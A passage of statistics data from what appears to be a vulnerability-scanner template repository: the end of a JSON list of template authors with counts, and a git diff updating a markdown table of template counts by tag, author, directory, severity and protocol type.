nagli","count":2},{"name":"0xsmiley","count":2},{"name":"fabaff","count":2},{"name":"0xsapra","count":2},{"name":"0xcrypto","count":2},{"name":"g4l1t0","count":2},{"name":"foulenzer","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whoever","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"parth","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"sy3omda","count":2},{"name":"convisoappsec","count":2},{"name":"r3naissance","count":2},{"name":"r12w4n","count":2},{"name":"bernardofsr","count":2},{"name":"cocxanh","count":2},{"name":"swissky","count":2},{"name":"huowuzhao","count":2},{"name":"hahwul","count":2},{"name":"kiblyn11","count":2},{"name":"koti2","count":2},{"name":"ree4pwn","count":2},{"name":"gevakun","count":2},{"name":"lotusdll","count":2},{"name":"moritz nentwig","count":2},{"name":"joeldeleep","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"afaq","count":2},{"name":"arcc","count":2},{"name":"x1m_martijn","count":2},{"name":"mohammedsaneem","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xelkomy","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"alifathi-h1","count":2},{"name":"vavkamil","count":2},{"name":"random-robbie","count":2},{"name":"nkxxkn","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"d0rkerdevil","count":1},{"name":"thebinitghimire","count":1},{"name":"toufik airane","count":1},{"name":"alex","count":1},{"name":"thevillagehacker","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"tim_koopmans","count":1},{"name":"petruknisme","count":1},{"name":"smaranchand","count":1},{"name":"@dwisiswant0","count":1},{"name":"rodnt","count":1},{"name":"cookiehanhoan","count":1},{"name":"shifacyclewla","count":1},{"name":"pratik khalane","count":1},{"name":"bjhulst","count":1},{"name":"droberson","count":1},{"name":"andysvints","count":1},{"name":"akshansh","count":1},{"name":"mesaglio","count":1},{"name":"52971","count":1},{"name":"push4d","count":1},{"name":"brabbit10","count":1},{"name":"manuelbua","count":1},{"name":"_harleo","count":1},{"name":"yashgoti","count":1},{"name":"hakluke","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"0xteles","count":1},{"name":"rojanrijal","count":1},{"name":"patralos","count":1},{"name":"izn0u","count":1},{"name":"_c0wb0y_","count":1},{"name":"luci","count":1},{"name":"alph4byt3","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"sickwell","count":1},{"name":"taielab","count":1},{"name":"0xd0ff9","count":1},{"name":"shreyapohekar","count":1},{"name":"wabafet","count":1},{"name":"0xtavian","count":1},{"name":"thezakman","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mubassirpatel","count":1},{"name":"akash.c","count":1},{"name":"zandros0","count":1},{"name":"noamrathaus","count":1},{"name":"mass0ma","count":1},{"name":"udyz","count":1},{"name":"andirrahmani1","count":1},{"name":"ooooooo_q","count":1},{"name":"micha3lb3n","count":1},{"name":"evolutionsec","count":1},{"name":"ahmetpergamum","count":1},{"name":"elder tao","count":1},{"name":"infosecsanyam","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"adrianmf","count":1},{"name":"mhdsamx","count":1},{"name":"bad5ect0r","count":1},{"name":"jrolf","count":1},{"name":"soyelmago","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"jteles","count":1},{"name":"tirtha_mandal","count":1},{"name":"sec_hawk","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"vzamanillo","count":1},{"name":"ilovebinbash","count":1},{"name":"berkdusunur","count":1},{"name":"exploitation","count":1},{"name":"xstp","count":1},{"name":"juicypotato1","count":1},{"name":"yashanand155","count":1},{"name":"retr0","count":1},{"name":"clarkvoss","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"jeya seelan","count":1},{"name":"aresx","count":1},{"name":"raesene","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"becivells","count":1},{"name":"kurohost","count":1},{"name":"chron0x","count":1},{"name":"defr0ggy","count":1},{"name":"x6263","count":1},{"name":"kre80r","count":1},{"name":"ajaysenr","count":1},{"name":"@ofjaaah","count":1},{"name":"lark lab","count":1},{"name":"kabirsuda","count":1},{"name":"whynotke","count":1},{"name":"fmunozs","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"0xrod","count":1},{"name":"oscarintherocks","count":1},{"name":"c3l3si4n","count":1},{"name":"b0yd","count":1},{"name":"borna nematzadeh","count":1},{"name":"pdp","count":1},{"name":"naglinagli","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"furkansenan","count":1},{"name":"luskabol","count":1},{"name":"nerrorsec","count":1},{"name":"intx0x80","count":1},{"name":"flag007","count":1},{"name":"kareemse1im","count":1},{"name":"daviey","count":1},{"name":"s1r1u5_","count":1},{"name":"philippdelteil","count":1},{"name":"b4uh0lz","count":1},{"name":"co0nan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"elmahdi","count":1},{"name":"remonsec","count":1},{"name":"pudsec","count":1},{"name":"notsoevilweasel","count":1},{"name":"omarkurt","count":1},{"name":"absshax","count":1},{"name":"nvn1729","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"un-fmunozs","count":1},{"name":"ohlinge","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007","count":1},{"name":"forgedhallpass","count":1},{"name":"zhenwarx","count":1},{"name":"ldionmarcil","count":1},{"name":"nytr0gen","count":1},{"name":"makyotox","count":1},{"name":"its0x08","count":1},{"name":"gboddin","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ringo","count":1},{"name":"ipanda","count":1},{"name":"0ut0fb4nd","count":1},{"name":"orpheus","count":1},{"name":"j33n1k4","count":1},{"name":"deena","count":1},{"name":"elouhi","count":1},{"name":"sshell","count":1},{"name":"0h1in9e","count":1},{"name":"qlkwej","count":1},{"name":"willd96","count":1},{"name":"alperenkesk","count":1},{"name":"rotemreiss","count":1},{"name":"b0rn2r00t","count":1},{"name":"knassar702","count":1},{"name":"revblock","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"sicksec","count":1},{"name":"bolli95","count":1}],"directory":[{"name":"cves","count":836},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":270},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":141},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":750},{"name":"high","count":649},{"name":"medium","count":475},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2211},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7e62861261..32a1631abc 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,925 +1,926 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | -| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -| cve2021 | 155 | zzeitlin | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 50 | network | 32 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | +| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 88 | organiccrap | 24 | fuzzing | 10 | | | | | -| apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | -| takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | -| default-login | 68 | milo2012 | 14 | | | | | | | +| cve2018 | 92 | organiccrap | 24 | fuzzing | 10 | | | | | +| apache | 73 | pr3r00t | 15 | cnvd | 9 | | | | | +| iot | 70 | sheikhrishad | 15 | headless | 5 | | | | | +| takeover | 69 | milo2012 | 14 | | | | | | | | oob | 68 | techbrunchfr | 13 | | | | | | | -| iot | 68 | suman_kar | 12 | | | | | | | +| default-login | 68 | suman_kar | 12 | | | | | | | | token | 67 | cyllective | 11 | | | | | | | | token-spray | 63 | r3dg33k | 11 | | | | | | | -| cve2017 | 51 | wdahlenb | 10 | | | | | | | -| file | 50 | nadino | 10 | | | | | | | +| cve2017 | 51 | random_robbie | 10 | | | | | | | +| file | 50 | righettod | 10 | | | | | | | | unauth | 49 | melbadry9 | 10 | | | | | | | -| network | 43 | random_robbie | 10 | | | | | | | -| ssrf | 41 | righettod | 10 | | | | | | | +| network | 43 | nadino | 10 | | | | | | | +| ssrf | 41 | wdahlenb | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | aashiq | 8 | | | | | | | -| cve2016 | 37 | that_juan_ | 8 | | | | | | | -| redirect | 37 | zh | 8 | | | | | | | -| oracle | 36 | iamthefrogy | 8 | | | | | | | -| logs | 30 | dr_set | 7 | | | | | | | -| google | 30 | emadshanab | 7 | | | | | | | -| jira | 28 | 0x240x23elu | 7 | | | | | | | -| atlassian | 28 | dogasantos | 7 | | | | | | | -| cve2015 | 28 | techryptic (@tech) | 7 | | | | | | | -| cisco | 27 | randomstr1ng | 7 | | | | | | | +| | 38 | zh | 8 | | | | | | | +| redirect | 37 | aashiq | 8 | | | | | | | +| cve2016 | 37 | iamthefrogy | 8 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | +| google | 30 | randomstr1ng | 7 | | | | | | | +| cve2015 | 29 | oppsec | 7 | | | | | | | +| atlassian | 29 | harshbothra_ | 7 | | | | | | | +| jira | 29 | meme-lord | 7 | | | | | | | +| cve2014 | 27 | 0x240x23elu | 7 | | | | | | | +| cisco | 27 | dogasantos | 7 | | | | | | | | listing | 27 | kophjager007 | 7 | | | | | | | -| cve2014 | 27 | harshbothra_ | 7 | | | | | | | -| generic | 24 | oppsec | 7 | | | | | | | -| misc | 23 | meme-lord | 7 | | | | | | | -| disclosure | 23 | puzzlepeaches | 6 | | | | | | | -| auth-bypass | 23 | logicalhunter | 6 | | | | | | | -| router | 21 | divya_mudgal | 6 | | | | | | | -| misconfig | 20 | pentest_swissky | 6 | | | | | | | -| aem | 19 | caspergn | 6 | | | | | | | -| sap | 18 | __fazal | 6 | | | | | | | -| cve2012 | 18 | ganofins | 5 | | | | | | | -| debug | 18 | rootxharsh | 5 | | | | | | | -| springboot | 18 | lu4nx | 5 | | | | | | | -| php | 16 | xelkomy | 5 | | | | | | | -| cve2011 | 15 | yanyun | 5 | | | | | | | -| devops | 15 | johnk3r | 5 | | | | | | | -| weblogic | 14 | iamnoooob | 5 | | | | | | | +| generic | 24 | dr_set | 7 | | | | | | | +| misc | 23 | emadshanab | 7 | | | | | | | +| disclosure | 23 | divya_mudgal | 6 | | | | | | | +| auth-bypass | 23 | caspergn | 6 | | | | | | | +| misconfig | 22 | logicalhunter | 6 | | | | | | | +| router | 22 | puzzlepeaches | 6 | | | | | | | +| aem | 19 | __fazal | 6 | | | | | | | +| cve2012 | 18 | pentest_swissky | 6 | | | | | | | +| springboot | 18 | panch0r3d | 5 | | | | | | | +| sap | 18 | lu4nx | 5 | | | | | | | +| debug | 18 | ganofins | 5 | | | | | | | +| php | 16 | yanyun | 5 | | | | | | | +| devops | 15 | rootxharsh | 5 | | | | | | | +| cve2011 | 15 | iamnoooob | 5 | | | | | | | | login | 14 | elsfa7110 | 5 | | | | | | | -| struts | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | panch0r3d | 5 | | | | | | | -| fuzz | 14 | e_schultze_ | 4 | | | | | | | -| aws | 14 | github.com/its0x08 | 4 | | | | | | | -| deserialization | 13 | incogbyte | 4 | | | | | | | -| zoho | 13 | nodauf | 4 | | | | | | | -| dns | 13 | johnjhacking | 3 | | | | | | | -| android | 13 | fyoorer | 3 | | | | | | | -| adobe | 13 | emenalf | 3 | | | | | | | -| manageengine | 12 | thomas_from_offensity | 3 | | | | | | | -| dlink | 12 | f1tz | 3 | | | | | | | -| wp-theme | 12 | jarijaas | 3 | | | | | | | -| jenkins | 12 | impramodsargar | 3 | | | | | | | -| magento | 11 | yash anand @yashanand155 | 3 | | | | | | | -| cve2013 | 11 | _generic_human_ | 3 | | | | | | | -| intrusive | 10 | binaryfigments | 3 | | | | | | | -| xxe | 10 | tess | 3 | | | | | | | -| dell | 10 | 0w4ys | 3 | | | | | | | -| hp | 10 | unstabl3 | 3 | | | | | | | -| vmware | 9 | dudez | 3 | | | | | | | -| kubernetes | 9 | shine | 3 | | | | | | | -| ftp | 9 | vsh00t | 3 | | | | | | | -| gitlab | 8 | mavericknerd | 3 | | | | | | | -| cve2008 | 8 | sushantkamble | 3 | | | | | | | -| backup | 8 | me9187 | 3 | | | | | | | -| scada | 8 | sullo | 3 | | | | | | | -| rails | 8 | z3bd | 3 | | | | | | | -| ibm | 8 | shifacyclewala | 3 | | | | | | | -| ruijie | 8 | skeltavik | 3 | | | | | | | -| cnvd | 8 | idealphase | 3 | | | | | | | -| nginx | 8 | bp0lr | 2 | | | | | | | -| airflow | 8 | 0xrudra | 2 | | | | | | | -| microsoft | 8 | socketz | 2 | | | | | | | -| fastjson | 8 | g4l1t0 | 2 | | | | | | | -| netgear | 7 | 0xsapra | 2 | | | | | | | -| cms | 7 | w4cky_ | 2 | | | | | | | -| confluence | 7 | udit_thakkur | 2 | | | | | | | -| coldfusion | 7 | bernardofsr | 2 | | | | | | | -| files | 7 | arcc | 2 | | | | | | | -| drupal | 6 | r3naissance | 2 | | | | | | | -| jetty | 6 | 0xelkomy | 2 | | | | | | | -| laravel | 6 | parth | 2 | | | | | | | -| docker | 6 | 0xsmiley | 2 | | | | | | | -| nodejs | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| solr | 6 | pxmme1337 | 2 | | | | | | | -| lucee | 6 | dheerajmadhukar | 2 | | | | | | | -| rconfig | 6 | koti2 | 2 | | | | | | | -| django | 6 | hetroublemakr | 2 | | | | | | | -| fileupload | 6 | davidmckennirey | 2 | | | | | | | -| api | 6 | huowuzhao | 2 | | | | | | | -| camera | 6 | vavkamil | 2 | | | | | | | -| citrix | 6 | amsda | 2 | | | | | | | -| windows | 5 | mohammedsaneem | 2 | | | | | | | -| jolokia | 5 | fabaff | 2 | | | | | | | -| ssti | 5 | sy3omda | 2 | | | | | | | -| iis | 5 | cocxanh | 2 | | | | | | | -| tomcat | 5 | foulenzer | 2 | | | | | | | -| java | 5 | r12w4n | 2 | | | | | | | -| phpmyadmin | 5 | hahwul | 2 | | | | | | | -| printer | 5 | whoever | 2 | | | | | | | -| dedecms | 5 | x1m_martijn | 2 | | | | | | | -| crlf | 5 | gevakun | 2 | | | | | | | -| headless | 5 | kiblyn11 | 2 | | | | | | | -| circarlife | 5 | joeldeleep | 2 | | | | | | | -| solarwinds | 4 | 0xprial | 2 | | | | | | | -| thinkphp | 4 | afaq | 2 | | | | | | | -| npm | 4 | ree4pwn | 2 | | | | | | | -| strapi | 4 | gal nagli | 2 | | | | | | | -| resin | 4 | randomrobbie | 2 | | | | | | | -| thinkcmf | 4 | manas_harsh | 2 | | | | | | | -| grafana | 4 | nkxxkn | 2 | | | | | | | -| webserver | 4 | zomsop82 | 2 | | | | | | | -| hongdian | 4 | 0xcrypto | 2 | | | | | | | -| fatpipe | 4 | random-robbie | 2 | | | | | | | -| elastic | 4 | bsysop | 2 | | | | | | | -| maps | 4 | moritz nentwig | 2 | | | | | | | -| exchange | 4 | alifathi-h1 | 2 | | | | | | | -| traversal | 4 | swissky | 2 | | | | | | | -| firmware | 4 | bing0o | 2 | | | | | | | -| rfi | 4 | convisoappsec | 2 | | | | | | | -| samsung | 4 | lotusdll | 2 | | | | | | | -| symantec | 4 | ehsahil | 2 | | | | | | | -| amazon | 4 | mubassirpatel | 1 | | | | | | | -| symfony | 4 | smaranchand | 1 | | | | | | | -| zabbix | 4 | omarkurt | 1 | | | | | | | -| wso2 | 4 | thevillagehacker | 1 | | | | | | | -| asp | 4 | mhdsamx | 1 | | | | | | | -| glpi | 4 | micha3lb3n | 1 | | | | | | | -| firebase | 4 | taielab | 1 | | | | | | | -| zimbra | 4 | luskabol | 1 | | | | | | | -| vpn | 4 | iampritam | 1 | | | | | | | -| git | 4 | hanlaomo | 1 | | | | | | | -| artifactory | 4 | ohlinge | 1 | | | | | | | -| slack | 4 | regala_ | 1 | | | | | | | -| buffalo | 4 | petruknisme | 1 | | | | | | | -| magmi | 4 | j33n1k4 | 1 | | | | | | | -| proxy | 4 | tirtha_mandal | 1 | | | | | | | -| moodle | 4 | 0ut0fb4nd | 1 | | | | | | | -| fpd | 3 | aceseven (digisec360) | 1 | | | | | | | -| nosqli | 3 | soyelmago | 1 | | | | | | | -| jeesns | 3 | 0xteles | 1 | | | | | | | -| caucho | 3 | wabafet | 1 | | | | | | | -| openam | 3 | evolutionsec | 1 | | | | | | | -| tikiwiki | 3 | udyz | 1 | | | | | | | -| terramaster | 3 | yashgoti | 1 | | | | | | | -| springcloud | 3 | akash.c | 1 | | | | | | | -| ebs | 3 | alperenkesk | 1 | | | | | | | -| lansweeper | 3 | dawid-czarnecki | 1 | | | | | | | -| cacti | 3 | kba@sogeti_esec | 1 | | | | | | | -| telerik | 3 | fmunozs | 1 | | | | | | | -| exposures | 3 | naglinagli | 1 | | | | | | | -| lfr | 3 | elder tao | 1 | | | | | | | -| prometheus | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| vbulletin | 3 | sec_hawk | 1 | | | | | | | -| httpd | 3 | elouhi | 1 | | | | | | | -| smtp | 3 | alex | 1 | | | | | | | -| fanruan | 3 | pudsec | 1 | | | | | | | -| itop | 3 | jrolf | 1 | | | | | | | -| cve2007 | 3 | qlkwej | 1 | | | | | | | -| kevinlab | 3 | co0nan | 1 | | | | | | | -| mail | 3 | oscarintherocks | 1 | | | | | | | -| backdoor | 3 | manuelbua | 1 | | | | | | | -| ofbiz | 3 | affix | 1 | | | | | | | -| r-seenet | 3 | vzamanillo | 1 | | | | | | | -| opensis | 3 | noamrathaus | 1 | | | | | | | -| kafka | 3 | @dwisiswant0 | 1 | | | | | | | -| openssh | 3 | un-fmunozs | 1 | | | | | | | -| cloud | 3 | notsoevilweasel | 1 | | | | | | | -| github | 3 | andirrahmani1 | 1 | | | | | | | -| jellyfin | 3 | shelld3v | 1 | | | | | | | -| search | 3 | bad5ect0r | 1 | | | | | | | -| hoteldruid | 3 | nytr0gen | 1 | | | | | | | -| log | 3 | its0x08 | 1 | | | | | | | -| druid | 3 | mesaglio | 1 | | | | | | | -| linkerd | 3 | 52971 | 1 | | | | | | | -| targa | 3 | ratnadip gajbhiye | 1 | | | | | | | -| nacos | 3 | flag007 | 1 | | | | | | | -| microstrategy | 3 | mass0ma | 1 | | | | | | | -| node | 3 | deena | 1 | | | | | | | -| injection | 3 | 0xtavian | 1 | | | | | | | -| cves | 3 | @ofjaaah | 1 | | | | | | | -| bitrix | 3 | b4uh0lz | 1 | | | | | | | -| nexus | 3 | apt-mirror | 1 | | | | | | | -| bigip | 3 | whynotke | 1 | | | | | | | -| oa | 3 | _darrenmartyn | 1 | | | | | | | -| ssh | 3 | knassar702 | 1 | | | | | | | -| azure | 3 | gboddin | 1 | | | | | | | -| zhiyuan | 3 | c3l3si4n | 1 | | | | | | | -| mongodb | 3 | rojanrijal | 1 | | | | | | | -| kibana | 3 | jeya seelan | 1 | | | | | | | -| mcafee | 2 | luci | 1 | | | | | | | -| nextcloud | 2 | sicksec | 1 | | | | | | | -| xxljob | 2 | bolli95 | 1 | | | | | | | -| bruteforce | 2 | push4d | 1 | | | | | | | -| hashicorp | 2 | defr0ggy | 1 | | | | | | | -| ec2 | 2 | ahmed sherif | 1 | | | | | | | -| wuzhicms | 2 | 0xd0ff9 | 1 | | | | | | | -| axis | 2 | shreyapohekar | 1 | | | | | | | -| netis | 2 | infosecsanyam | 1 | | | | | | | -| splunk | 2 | forgedhallpass | 1 | | | | | | | -| chiyu | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| rstudio | 2 | yavolo | 1 | | | | | | | -| yii | 2 | toufik airane | 1 | | | | | | | -| ucmdb | 2 | ooooooo_q | 1 | | | | | | | -| frp | 2 | mah3sec_ | 1 | | | | | | | -| smb | 2 | akshansh | 1 | | | | | | | -| guacamole | 2 | remonsec | 1 | | | | | | | -| ecology | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| rancher | 2 | kre80r | 1 | | | | | | | -| jeedom | 2 | thebinitghimire | 1 | | | | | | | -| s3 | 2 | th3.d1p4k | 1 | | | | | | | -| icewarp | 2 | 0h1in9e | 1 | | | | | | | -| bucket | 2 | alph4byt3 | 1 | | | | | | | -| places | 2 | rotemreiss | 1 | | | | | | | -| tidb | 2 | clarkvoss | 1 | | | | | | | -| hostheader-injection | 2 | cookiehanhoan | 1 | | | | | | | -| getsimple | 2 | ldionmarcil | 1 | | | | | | | -| hasura | 2 | nerrorsec | 1 | | | | | | | -| maian | 2 | @github.com/defr0ggy | 1 | | | | | | | -| heroku | 2 | brabbit10 | 1 | | | | | | | -| voipmonitor | 2 | fopina | 1 | | | | | | | -| text | 2 | d0rkerdevil | 1 | | | | | | | -| cve2005 | 2 | s1r1u5_ | 1 | | | | | | | -| trixbox | 2 | pratik khalane | 1 | | | | | | | -| hjtcloud | 2 | yashanand155 | 1 | | | | | | | -| sitecore | 2 | tim_koopmans | 1 | | | | | | | -| totemomail | 2 | zhenwarx | 1 | | | | | | | -| cache | 2 | hakluke | 1 | | | | | | | -| saltstack | 2 | raesene | 1 | | | | | | | -| showdoc | 2 | chron0x | 1 | | | | | | | -| axis2 | 2 | _c0wb0y_ | 1 | | | | | | | -| wordfence | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| yapi | 2 | b0yd | 1 | | | | | | | -| db | 2 | blckraven | 1 | | | | | | | -| prestashop | 2 | ahmetpergamum | 1 | | | | | | | -| jboss | 2 | lark lab | 1 | | | | | | | -| activemq | 2 | schniggie | 1 | | | | | | | -| justwriting | 2 | retr0 | 1 | | | | | | | -| hpe | 2 | patralos | 1 | | | | | | | -| vcenter | 2 | 0xrod | 1 | | | | | | | -| horde | 2 | pdp | 1 | | | | | | | -| kong | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| upload | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| adminer | 2 | nvn1729 | 1 | | | | | | | -| pega | 2 | ilovebinbash | 1 | | | | | | | -| status | 2 | daviey | 1 | | | | | | | -| backups | 2 | _harleo | 1 | | | | | | | -| flir | 2 | bernardo rodrigues | 1 | | | | | | | +| fuzz | 14 | xelkomy | 5 | | | | | | | +| cve2009 | 14 | joanbono | 5 | | | | | | | +| aws | 14 | johnk3r | 5 | | | | | | | +| weblogic | 14 | nodauf | 4 | | | | | | | +| struts | 14 | github.com/its0x08 | 4 | | | | | | | +| dns | 13 | e_schultze_ | 4 | | | | | | | +| android | 13 | wisnupramoedya | 4 | | | | | | | +| dlink | 13 | tess | 4 | | | | | | | +| adobe | 13 | incogbyte | 4 | | | | | | | +| deserialization | 13 | mavericknerd | 3 | | | | | | | +| zoho | 13 | shifacyclewala | 3 | | | | | | | +| manageengine | 12 | fyoorer | 3 | | | | | | | +| jenkins | 12 | sullo | 3 | | | | | | | +| wp-theme | 12 | yash anand @yashanand155 | 3 | | | | | | | +| magento | 11 | vsh00t | 3 | | | | | | | +| cve2013 | 11 | binaryfigments | 3 | | | | | | | +| intrusive | 10 | impramodsargar | 3 | | | | | | | +| xxe | 10 | johnjhacking | 3 | | | | | | | +| dell | 10 | unstabl3 | 3 | | | | | | | +| hp | 10 | 0w4ys | 3 | | | | | | | +| vmware | 9 | z3bd | 3 | | | | | | | +| ftp | 9 | jarijaas | 3 | | | | | | | +| kubernetes | 9 | me9187 | 3 | | | | | | | +| gitlab | 8 | idealphase | 3 | | | | | | | +| scada | 8 | sushantkamble | 3 | | | | | | | +| cve2008 | 8 | _generic_human_ | 3 | | | | | | | +| airflow | 8 | dudez | 3 | | | | | | | +| backup | 8 | emenalf | 3 | | | | | | | +| ibm | 8 | shine | 3 | | | | | | | +| microsoft | 8 | f1tz | 3 | | | | | | | +| rails | 8 | skeltavik | 3 | | | | | | | +| cnvd | 8 | thomas_from_offensity | 3 | | | | | | | +| ruijie | 8 | parth | 2 | | | | | | | +| nginx | 8 | alifathi-h1 | 2 | | | | | | | +| fastjson | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| netgear | 7 | g4l1t0 | 2 | | | | | | | +| files | 7 | afaq | 2 | | | | | | | +| cms | 7 | swissky | 2 | | | | | | | +| coldfusion | 7 | nkxxkn | 2 | | | | | | | +| confluence | 7 | koti2 | 2 | | | | | | | +| jetty | 6 | bernardofsr | 2 | | | | | | | +| nodejs | 6 | lotusdll | 2 | | | | | | | +| lucee | 6 | moritz nentwig | 2 | | | | | | | +| phpmyadmin | 6 | huowuzhao | 2 | | | | | | | +| solr | 6 | socketz | 2 | | | | | | | +| drupal | 6 | arcc | 2 | | | | | | | +| django | 6 | 0xsapra | 2 | | | | | | | +| laravel | 6 | 0xelkomy | 2 | | | | | | | +| rconfig | 6 | sy3omda | 2 | | | | | | | +| citrix | 6 | gal nagli | 2 | | | | | | | +| api | 6 | dheerajmadhukar | 2 | | | | | | | +| fileupload | 6 | joeldeleep | 2 | | | | | | | +| docker | 6 | bing0o | 2 | | | | | | | +| camera | 6 | fabaff | 2 | | | | | | | +| crlf | 5 | 0xsmiley | 2 | | | | | | | +| jolokia | 5 | r12w4n | 2 | | | | | | | +| circarlife | 5 | hahwul | 2 | | | | | | | +| printer | 5 | pxmme1337 | 2 | | | | | | | +| java | 5 | zomsop82 | 2 | | | | | | | +| headless | 5 | ree4pwn | 2 | | | | | | | +| windows | 5 | whoever | 2 | | | | | | | +| iis | 5 | udit_thakkur | 2 | | | | | | | +| dedecms | 5 | mohammedsaneem | 2 | | | | | | | +| ssti | 5 | davidmckennirey | 2 | | | | | | | +| tomcat | 5 | random-robbie | 2 | | | | | | | +| git | 4 | amsda | 2 | | | | | | | +| vpn | 4 | foulenzer | 2 | | | | | | | +| wso2 | 4 | r3naissance | 2 | | | | | | | +| thinkphp | 4 | manas_harsh | 2 | | | | | | | +| npm | 4 | vavkamil | 2 | | | | | | | +| slack | 4 | kiblyn11 | 2 | | | | | | | +| exchange | 4 | 0xrudra | 2 | | | | | | | +| symantec | 4 | bsysop | 2 | | | | | | | +| firmware | 4 | randomrobbie | 2 | | | | | | | +| webserver | 4 | cocxanh | 2 | | | | | | | +| artifactory | 4 | x1m_martijn | 2 | | | | | | | +| zimbra | 4 | gevakun | 2 | | | | | | | +| magmi | 4 | bp0lr | 2 | | | | | | | +| firebase | 4 | convisoappsec | 2 | | | | | | | +| symfony | 4 | 0xcrypto | 2 | | | | | | | +| samsung | 4 | 0xprial | 2 | | | | | | | +| solarwinds | 4 | hetroublemakr | 2 | | | | | | | +| buffalo | 4 | ehsahil | 2 | | | | | | | +| hongdian | 4 | w4cky_ | 2 | | | | | | | +| rfi | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| resin | 4 | ratnadip gajbhiye | 1 | | | | | | | +| strapi | 4 | shelld3v | 1 | | | | | | | +| maps 